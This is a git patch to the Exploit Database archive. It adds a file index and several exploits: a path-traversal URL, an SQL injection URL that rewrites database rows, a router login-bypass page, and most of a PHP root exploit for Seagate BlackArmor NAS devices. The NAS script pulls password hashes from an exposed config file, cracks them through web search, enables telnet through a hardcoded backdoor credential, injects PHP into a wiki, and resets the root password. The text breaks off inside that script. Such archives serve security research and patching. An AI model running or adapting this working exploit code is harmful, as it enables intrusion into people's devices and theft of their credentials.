From a849a67d6623823e353e633c6ae85726bf4176d2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 Jan 2014 04:09:46 +0000 Subject: [PATCH] Updated 01_07_2014 --- files.csv | 42 +- platforms/asp/webapps/30743.txt | 9 + platforms/asp/webapps/30747.txt | 7 + platforms/hardware/remote/30740.html | 82 ++ platforms/hardware/webapps/30723.php | 1124 ++++++++++++++++++++ platforms/hardware/webapps/30725.txt | 65 ++ platforms/hardware/webapps/30726.2013-6922 | 62 ++ platforms/hardware/webapps/30727.txt | 75 ++ platforms/linux/dos/30724.txt | 11 + platforms/linux/remote/30711.txt | 26 + platforms/linux/remote/30736.txt | 21 + platforms/linux/remote/30744.txt | 22 + platforms/multiple/dos/30713.html | 61 ++ platforms/multiple/remote/30729.txt | 11 + platforms/multiple/remote/30742.txt | 51 + platforms/php/webapps/30712.txt | 8 + platforms/php/webapps/30715.txt | 9 + platforms/php/webapps/30716.txt | 9 + platforms/php/webapps/30717.txt | 8 + platforms/php/webapps/30718.txt | 9 + platforms/php/webapps/30719.txt | 9 + platforms/php/webapps/30731.txt | 9 + platforms/php/webapps/30732.txt | 9 + platforms/php/webapps/30733.txt | 9 + platforms/php/webapps/30734.txt | 9 + platforms/php/webapps/30735.txt | 9 + platforms/php/webapps/30737.txt | 9 + platforms/php/webapps/30738.txt | 9 + platforms/php/webapps/30739.txt | 7 + platforms/php/webapps/30741.txt | 9 + platforms/php/webapps/30745.html | 21 + platforms/php/webapps/30746.txt | 9 + platforms/php/webapps/30748.txt | 9 + platforms/php/webapps/30750.pl | 119 +++ platforms/php/webapps/30751.html | 9 + platforms/php/webapps/30752.txt | 9 + platforms/php/webapps/30753.txt | 9 + platforms/unix/dos/30714.pl | 27 + platforms/windows/dos/30749.html | 22 + platforms/windows/remote/30720.html | 9 + platforms/windows/remote/30730.txt | 12 + 41 files changed, 2054 insertions(+), 1 deletion(-) create mode 100755 platforms/asp/webapps/30743.txt create mode 100755 platforms/asp/webapps/30747.txt create mode 100755 platforms/hardware/remote/30740.html create mode 100755 platforms/hardware/webapps/30723.php create mode 100755 platforms/hardware/webapps/30725.txt create mode 100755 platforms/hardware/webapps/30726.2013-6922 create mode 100755 platforms/hardware/webapps/30727.txt create mode 100755 platforms/linux/dos/30724.txt create mode 100755 platforms/linux/remote/30711.txt create mode 100755 platforms/linux/remote/30736.txt create mode 100755 platforms/linux/remote/30744.txt create mode 100755 platforms/multiple/dos/30713.html create mode 100755 platforms/multiple/remote/30729.txt create mode 100755 platforms/multiple/remote/30742.txt create mode 100755 platforms/php/webapps/30712.txt create mode 100755 platforms/php/webapps/30715.txt create mode 100755 platforms/php/webapps/30716.txt create mode 100755 platforms/php/webapps/30717.txt create mode 100755 platforms/php/webapps/30718.txt create mode 100755 platforms/php/webapps/30719.txt create mode 100755 platforms/php/webapps/30731.txt create mode 100755 platforms/php/webapps/30732.txt create mode 100755 platforms/php/webapps/30733.txt create mode 100755 platforms/php/webapps/30734.txt create mode 100755 platforms/php/webapps/30735.txt create mode 100755 platforms/php/webapps/30737.txt create mode 100755 platforms/php/webapps/30738.txt create mode 100755 platforms/php/webapps/30739.txt create mode 100755 platforms/php/webapps/30741.txt create mode 100755 platforms/php/webapps/30745.html create mode 100755 platforms/php/webapps/30746.txt create mode 100755 platforms/php/webapps/30748.txt create mode 100755 platforms/php/webapps/30750.pl create mode 100755 platforms/php/webapps/30751.html create mode 100755 platforms/php/webapps/30752.txt create mode 100755 platforms/php/webapps/30753.txt create mode 100755 platforms/unix/dos/30714.pl create mode 100755 platforms/windows/dos/30749.html create mode 100755 platforms/windows/remote/30720.html create mode 100755 platforms/windows/remote/30730.txt diff --git a/files.csv b/files.csv index f816b2123..113d061ef 100755 --- a/files.csv +++ b/files.csv @@ -24470,7 +24470,7 @@ id,file,description,date,author,platform,type,port 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0 27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 - CSRF Vulnerability",2013-08-07,"Dylan Irzi",php,webapps,0 27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0 -27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 +27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server 1.2 (Gabriel's FTP Server) - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0 27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent XSS Vulnerability",2013-08-07,RogueCoder,php,webapps,0 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection Vulnerability",2013-08-07,"Matias Fontanini",php,webapps,0 @@ -27548,3 +27548,43 @@ id,file,description,date,author,platform,type,port 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0 +30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x Remote Directory Traversal Vulnerability",2007-10-25,"Pete Foster",linux,remote,0 +30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 +30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service Vulnerability",2007-10-26,"The Hacker Webzine",multiple,dos,0 +30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow Vulnerability",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 +30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.PHP Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0 +30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0 +30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.PHP Cross-Site Scripting Vulnerability",2007-10-29,Doz,php,webapps,0 +30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0 +30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.PHP SQL Injection Vulnerability",2007-10-29,netVigilance,php,webapps,0 +30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow Vulnerability",2007-10-29,anonymous,windows,remote,0 +30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0 +30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 +30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 +30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 +30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.PHP Information Disclosure Vulnerability",2007-11-01,d3hydr8,php,webapps,0 +30733,platforms/php/webapps/30733.txt,"phpMyAdmin <= 2.11.1 Server_Status.PHP Cross-Site Scripting Vulnerability",2007-10-17,"Omer Singer",php,webapps,0 +30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.PHP Cross Site Scripting Vulnerability",2007-11-02,"Ivan Sanchez",php,webapps,0 +30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.PHP Local File Include Vulnerability",2007-11-03,joseph.giron13,php,webapps,0 +30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 Local Variable Handling Code Execution Vulnerability",2007-11-02,"Drake Wilson",linux,remote,0 +30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 Upload_Config.PHP Remote File Include Vulnerability",2007-11-05,"arfis project",php,webapps,0 +30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.PHP SQL Injection Vulnerability",2007-11-05,R00t[ATI],php,webapps,0 +30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.PHP Cross-Site Scripting Vulnerability",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 +30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass Vulnerability",2007-11-05,"David Smith",hardware,remote,0 +30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0 +30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0 +30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0 +30744,platforms/linux/remote/30744.txt,"MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,remote,0 +30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0 +30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0 +30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0 +30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.PHP SQL injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0 +30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability",2007-11-12,"Elazar Broad",windows,dos,0 +30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0 +30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0 +30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0 +30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0 diff --git a/platforms/asp/webapps/30743.txt b/platforms/asp/webapps/30743.txt new file mode 100755 index 000000000..00f81f51f --- /dev/null +++ b/platforms/asp/webapps/30743.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26348/info + +i-Gallery is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input. + +Exploiting this issue may allow an unauthorized remote user to view arbitrary local files in the context of the webserver process. Information obtained may aid in further attacks. + +i-Gallery 3.4 is vulnerable to this issue; other versions may also be vulnerable. + +http://www.example.com/gallery/igallery.asp?d=%5c../../%5c \ No newline at end of file diff --git a/platforms/asp/webapps/30747.txt b/platforms/asp/webapps/30747.txt new file mode 100755 index 000000000..2dde3f163 --- /dev/null +++ b/platforms/asp/webapps/30747.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26379/info + +Rapid Classified is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +http://www.example.com/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';-- \ No newline at end of file diff --git a/platforms/hardware/remote/30740.html b/platforms/hardware/remote/30740.html new file mode 100755 index 000000000..c8f6bf362 --- /dev/null +++ b/platforms/hardware/remote/30740.html @@ -0,0 +1,82 @@ +source: http://www.securityfocus.com/bid/26333/info + +BT Home Hub is prone to an authentication-bypass vulnerability. + +An attacker could exploit this issue to gain unauthorized access to the affected device. + +BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected. + +This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password. It has been tested to work with firmware version 6.2.2.6. + +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + + + diff --git a/platforms/hardware/webapps/30723.php b/platforms/hardware/webapps/30723.php new file mode 100755 index 000000000..505e00352 --- /dev/null +++ b/platforms/hardware/webapps/30723.php @@ -0,0 +1,1124 @@ + ## + +######################################################################## + +## Public Release v0.2 + +######################################################################## + + + +abstract class MD5Decryptor { + + abstract public function probe($hash); + + + + public static function plain($hash, $class = NULL) + + { + + if ($class === NULL) { + + $class = get_called_class(); + + } else { + + $class = sprintf("MD5Decryptor%s", $class); + + } + + $decryptor = new $class(); + + + + if (count($hash) > 1) { + + foreach ($hash as &$one) { + + $one = $decryptor->probe($one); + + } + + } else { + + $hash = $decryptor->probe($hash); + + } + + return $hash; + + } + + + + public function dictionaryAttack($hash, array $wordlist) + + { + + $hash = strtolower($hash); + + foreach ($wordlist as $word) { + + if (md5($word) === $hash) + + return $word; + + } + + } + +} + + + +abstract class MD5DecryptorWeb extends MD5Decryptor { + + protected $url; + + + + public function getWordlist($hash) + + { + + $list = FALSE; + + $url = sprintf($this->url, $hash); + + if ($response = file_get_contents($url)) { + + $list[$response] = 1; + + $list += array_flip(preg_split("/\s+/", $response)); + + $list += array_flip(preg_split("/(?:\s|\.)+/", $response)); + + $list = array_keys($list); + + } + + return $list; + + } + + public function probe($hash) { + + $hash = strtolower($hash); + + return $this->dictionaryAttack($hash, $this->getWordlist($hash)); + + } + +} + + + +class MD5DecryptorGoogle extends MD5DecryptorWeb { + + protected $url = "http://www.google.com/search?q=%s"; + +} + + + +function portcheck($host, $port) { + + $connection = @fsockopen($host, $port); + + + + if (is_resource($connection)) { + + $port_status = "reachable"; + + fclose($connection); + + } else { + + $port_status = "unreachable"; + + } + + return $port_status; + +} + + + +function authenticate($url, $username, $password) { + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); + + + + curl_setopt($ch, CURLOPT_HEADER, 1); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "p_user=" . $username . "&p_pass=" . +$password); + + curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url); + + + + curl_exec($ch); + + curl_close($ch); + +} + + + +function RemoteCodeExec($url, $command) { + + $url = $url . "/backupmgt/getAlias.php?ip=" . urlencode("xx +/etc/passwd; ") . urlencode($command) . ";"; + + $handle = fopen($url, "r"); + +} + + + +function RemoteFileExist($url) { + + $ch = curl_init($url); + + + + curl_setopt($ch, CURLOPT_NOBODY, true); + + curl_exec($ch); + + + + $retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); + + return $retcode; + + curl_close($ch); + +} + + + +function getWikiSecurityToken($url) { + + $curl = curl_init($url); + + curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); + + curl_setopt($curl, CURLOPT_AUTOREFERER, TRUE); + + curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); + + curl_setopt($curl, CURLOPT_COOKIEFILE, "cookie.txt"); + + + + $html = curl_exec($curl); + + + + $doc = new DOMDocument; + + @$doc->loadHTML($html); + + $tags = $doc->getElementsByTagName('input'); + + + + foreach ($tags as $tag) { + + $search = $tag->getAttribute('value'); + + if (strlen($search) == "32") { + + return $search; + + exit; + + } + + } + +} + + + +$version = "0.2"; + + + +if (!isset($argv[1])) { + + + +echo "------------------------------------------------------------------\n"; + +echo " Seagate BlackArmor NAS Exploit v" . $version . " (c) 2013 - " . +date('Y') . " by J. Diel \n"; + +echo " IT Nerdbox :: http://www.nerdbox.it :: jeroen@nerdbox.it\n"; + +echo "------------------------------------------------------------------\n"; + +echo "\nUsage: php " . $argv[0] . " \n\n"; + +echo "Example Usage: php " . $argv[0] . " http://\n"; + +die(); + +} + + + +$curl = curl_init(); + +$url = $argv[1] . "/admin/config.xml"; + + + +curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); + +curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); + +curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + +curl_setopt($curl, CURLOPT_URL, $url); + + + +$xmldata = curl_exec($curl); + +$http_status = curl_getinfo($curl, CURLINFO_HTTP_CODE); + +curl_close($curl); + + + +if ($http_status == "0") { + + echo "[Error]: The host was not found!\n\n"; + + die(); + +} + + + +if ($http_status == "404") { + + echo "[Error]: The page was not found! Are you sure this is +a Seagate BlackArmor NAS?\n"; + + die(); + +} + + + +$xml = new SimpleXMLElement($xmldata); + + + +$internal_ip = $xml->xpath("network/lan/ip"); + +$internal_sn = $xml->xpath("network/lan/netmask"); + +$internal_gw = $xml->xpath("network/lan/gateway"); + +$dns0 = $xml->xpath("network/lan/dns0"); + +$dns1 = $xml->xpath("network/lan/dns1"); + + + +echo "------------------------------------------------------------------\n"; + +echo "- Network Details: \n"; + +echo "------------------------------------------------------------------\n"; + + + +echo "- IP Address : " . $internal_ip[0] . "/" . $internal_sn[0] . +"\n"; + +echo "- Gateway / Router : " . $internal_gw[0] . "/" . $internal_sn[0] . +"\n"; + +echo "- 1st DNS Server : " . $dns0[0] . "\n"; + +echo "- 2nd DNS Server : " . $dns1[0] . "\n\n"; + + + + + +$serv_pnp = $xml->xpath("network/service/upnp/enable"); + +$serv_ftp = $xml->xpath("network/service/ftp/enable"); + +$serv_ftp_port = $xml->xpath("network/service/ftp/fport"); + +$serv_nfs = $xml->xpath("network/service/nfs/enable"); + + + +echo "------------------------------------------------------------------\n"; + +echo "- Network Services: \n"; + +echo "------------------------------------------------------------------\n"; + +$host = explode("/", $argv[1]); + +$host = $host[2]; + + + +echo "- uPNP : " . $serv_pnp[0] . "\n"; + +echo "- FTP : " . $serv_ftp[0] . " (port: " . +$serv_ftp_port[0] . " - " . portcheck("$host", "$serv_ftp_port[0]") . ")\n"; + +echo "- NFS : " . $serv_nfs[0] . "\n\n"; + + + +$shares = $xml->xpath("shares/nasshare/sharename"); + +$cnt = count($shares); + + + +echo "------------------------------------------------------------------\n"; + +echo "- Network Shares: " . $cnt . "\n"; + +echo "------------------------------------------------------------------\n"; + + + +for ($i=0; $i<$cnt; $i++) { + + echo "- " . $shares[$i] . "\n"; + +} + +echo "\n"; + + + +$username = $xml->xpath("access/users/nasuser/username"); + + + +while(list( , $node) = each ($username)) { + + $users[] = $node; + +} + + + +$md5hash = $xml->xpath("access/users/nasuser/htusers"); + + + +while(list( , $node) = each ($md5hash)) { + + $md5s[] = $node; + +} + + + +$max = count($users); + + + +echo "------------------------------------------------------------------\n"; + +echo "- User hashes found: \n"; + +echo "------------------------------------------------------------------\n"; + + + +$pwdcount = 0; + + + +for ($i=0; $i<$max; $i++) { + + + + $file = "md5.hash"; + + $fh = fopen($file, (file_exists($file)) ? "a" : "w"); + + fclose($fh); + + + + $contents = file_get_contents($file); + + $pattern = preg_quote($md5s[$i], "/"); + + $pattern = "/^.*$pattern.*\$/m"; + + + + if (preg_match_all($pattern, $contents, $matches)){ + + $pwdcount++; + + + + if ($users[$i] != "admin") { + + } else { + + $admin_found = "1"; + + $admin_password = explode(":", implode("\n", $matches[0])); + + } + + echo "- " . implode("\n", $matches[0]) . " (username: " . $users[$i] . +")\n"; + + $next_user = $users[$i]; + + $next_pass = explode(":", implode("\n", $matches[0])); + + + + } else { + + $hashes[] = array("$md5s[$i]", "$users[$i]"); + + echo "- " . $md5s[$i] . " (username: " . $users[$i] . ")\n"; + + } + +} + + + +if ($pwdcount == 0) { + + echo +"\n------------------------------------------------------------------\n"; + + echo "- No passwords could be found in local storage! \n"; + + echo +"------------------------------------------------------------------\n"; + + echo "- Search for hashes online? Type 'yes' to continue: "; + + + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == "yes"){ + + $decryptors = array("Google"); + + + + echo +"\n------------------------------------------------------------------\n"; + + echo "- Searching online for passwords: \n"; + + echo +"------------------------------------------------------------------\n"; + + foreach ($hashes as $hash) { + + echo "- " . $hash[0]; + + foreach($decryptors as $decrytor) { + + if (NULL !== ($plain = +MD5Decryptor::plain($hash[0], $decrytor))) { + + echo " - found: $plain"; + + $pwdcount++; + + + + $next_user = +$hash[1]; + + $next_pass = +$plain; + + + + if +($next_user == "admin") { + + +$admin_found = "1"; + + +$admin_pass = $plain; + + } + + + + $fh = +fopen($file, (file_exists($file)) ? "a" : "w"); + + fwrite($fh, +$hash[0] . ":" . $plain . "\n"); + + fclose($fh); + + break; + + } else { + + echo " - not found!"; + + } + + } + + echo "\n"; + + } + + + + } + +} + + + +if ($pwdcount != 0) { + + echo "\nTotal number of passwords found: " . $pwdcount . "\n\n"; + + echo +"------------------------------------------------------------------\n"; + + echo "- Services: \n"; + + echo +"------------------------------------------------------------------\n"; + + + + if (isset($admin_found)) { + + $telnet_user = "admin"; + + if (isset($admin_password[1])) { + + $telnet_pass = $admin_password[1]; + + } else { + + $telnet_pass = $admin_pass; + + } + + } else { + + $telnet_user = $next_user; + + $telnet_pass = $next_pass[1]; + + } + + + + $telnet_status = portcheck("$host", "23"); + + + + if ($telnet_status == "reachable") { + + echo "- The telnet daemon is already running: [skipped]\n"; + + } else { + + + + echo "- Enable the telnet daemon? Type 'yes' to continue: "; + + + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) != "yes"){ + + } else { + + echo "- Trying to start the telnet daemon : "; + + + + $url = $argv[1]; + + + + authenticate($url, $telnet_user, $telnet_pass); + + + + $ch = curl_init(); + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, false); + + curl_setopt($ch, CURLOPT_HTTPHEADER, + + array( + + "Authorization: Basic SmVXYWI6c3lzYWRtaW4=" + + )); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + + curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . +"/admin/sxmJEWAB/SXMjewab.php?telnet=jewab&debug=1"); + + curl_setopt($ch, CURLOPT_TIMEOUT, 5); + + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5); + + curl_exec($ch); + + curl_close($ch); + + + + echo "[done]\n"; + + echo "- Verifiying telnet daemon status : "; + + + + $telnet_status = portcheck("$host", "23"); + + if ($telnet_status == "reachable") { + + echo "[verified]\n"; + + } else { + + echo "[error]\n"; + + echo "- This is possible if portforwarding is not +enabled for telnet\n"; + + } + + } + + } + + + + $xml = new SimpleXMLElement($xmldata); + + $wiki = $xml->xpath("enableddokuwikiserver"); + + $wiki = $wiki[0]; + + + + if ($wiki == "yes") { + + echo "- The Wiki server is enabled : [skipped]\n"; + + } else { + + echo "- Enabeling the Wiki server : "; + + + + $url = $argv[1]; + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, +'enablewiki=yes&agree=yes&btn=Submit'); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + + curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . '/admin/dokuwiki_service.php'); + + + + curl_exec($ch); + + curl_close($ch); + + + + echo "[done]\n"; + + } + + + + echo "- Retrieving wiki security token : "; + + $sectok = getWikiSecurityToken($argv[1] . +"/wiwiki/doku.php?do=login&id=start"); + + + + if (isset($sectok)) { + + echo "[found]\n"; + + } else { + + echo "[Not Found]\n"; + + exit; + + } + + + + if (isset($admin_found)) { + + echo "- Logging in to the wiki server : "; + + $url = $argv[1]; + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "u=" . $telnet_user . "&p=" . +$telnet_pass . "§ok=" . $sectok ."&do=login&id=start"); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + + curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + + + curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php"); + + + + curl_exec($ch); + + $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE); + + curl_close($ch); + + + + echo "[done]\n"; + + + + echo "- Enabling PHP in wiki server : "; + + $sectok = getWikiSecurityToken($url . +"/wiwiki/doku.php?id=start&do=admin&page=config"); + + + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "config[phpok]=1§ok=" . +$sectok . "&do=admin&page=config&save=1&submit=Save"); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + + curl_setopt($ch, CURLOPT_AUTOREFERER, 1); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php?id=start"); + + + + curl_exec($ch); + + curl_close($ch); + + + + echo "[done]\n"; + + echo +"\n------------------------------------------------------------------\n"; + + echo "- Rooting the NAS: \n"; + + echo +"------------------------------------------------------------------\n"; + + echo "- Enter the new root password: "; + + + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == ""){ + + $root_password = "mypassword"; + + echo "- No root password chosen! Setting our own: '" . +$root_password . "'\n"; + + } else { + + $root_password = preg_replace( "/\r|\n/", "", $line); + + } + + + + $ch = curl_init(); + + + + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); + + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); + + curl_setopt($ch, CURLOPT_POST, true); + + curl_setopt($ch, CURLOPT_POSTFIELDS, "sectok=" . $sectok . +"&id=playground:playground&do[save]=Save&wikitext=exec(\"/usr/sbin/drop +bear start;\"); exec(\"echo '" . $root_password . "' | passwd +--stdin;\");"); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + + curl_setopt($ch, CURLOPT_AUTOREFERER, 1); + + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + + + + curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); + + curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php"); + + curl_exec($ch); + + curl_close($ch); + + + + echo "- The devices is rooted! The password is: " . +$root_password ."\n"; + + echo "- The SSH daemon was also enabled!!\n\n"; + + + + } else { + + echo "- Can't root the device due to lack of admin +credentials\n"; + + + + echo "- However, do you want to reset the admin password? [yes]:"; 